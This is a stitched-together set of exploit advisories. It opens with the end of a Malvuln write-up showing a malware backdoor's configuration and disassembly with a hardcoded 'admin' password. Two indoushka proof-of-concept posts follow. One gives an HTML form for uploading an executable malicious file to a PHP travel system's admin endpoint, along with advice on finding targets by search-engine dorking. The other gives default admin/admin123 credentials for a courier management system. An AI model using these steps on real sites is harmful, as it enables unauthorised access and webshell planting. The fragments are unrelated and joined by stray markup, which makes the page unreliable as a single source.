TreeLayout=1 CloseTray=0 MinimizeTray=1 BalloonTip=1 Prompt=0 PromptExit=0 PromptDelete=1 ColumnInfo=1 Groups=0 ColumnPath=%PI%\Data\ Thumbs=0 ThumbSize=96 Highlight=0 HighlightExt= ScrSize=75 ScrBits=24 ShareTo= ShareToSocks= ShareSocks=0 [Placement] DataTransfers=1 MaximizedState=0 Top=63 Left=416 Width=936 Height=540 ConTop=132 ConLeft=260 ConWidth=650 ConHeight=380 [Client0] Port=3460 KeyFile=0 Password=admin Exploit/PoC: DE:0055DD64 aPassword_7 db 'Password: *****',0 ; DATA XREF: sub_55D128+292↑o CODE:0055DD74 dd 0FFFFFFFFh, 5 CODE:0055DD7C aAdmin_2 db 'admin',0 ; DATA XREF: sub_55D128:loc_55D3C6↑o 004016C0 db 61h ; a 004016C1 db 70h ; p 004016C2 db 70h ; p 004016C3 db 61h ; a 004016C4 db 72h ; r 004016C5 db 69h ; i 004016C6 db 74h ; t 004016C7 db 69h ; i 004016C8 db 6Fh ; o 004016C9 db 6Eh ; n 004016CA db 73h ; s 004016CB db 65h ; e 004016CC db 63h ; c Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>============================================================================================================================================= | # Title : Travel v1.0 Remote File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://github.com/oretnom23/php-travel-agency-system | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code uploads a executable malicious file remotely . <form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data"> <label for="file">Upload File:</label> <input type="file" id="file" name="file"> <input type="submit" name="Fcuk Up" value="Fcuk Up"> </form> [+] Go to the line 1. [+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html . [+] Path : http://127.0.0.1/tour/admin/upload/webadmin.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>============================================================================================================================================= | # Title : Tenant courier management v1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin & pass = admin123 [+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/ Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>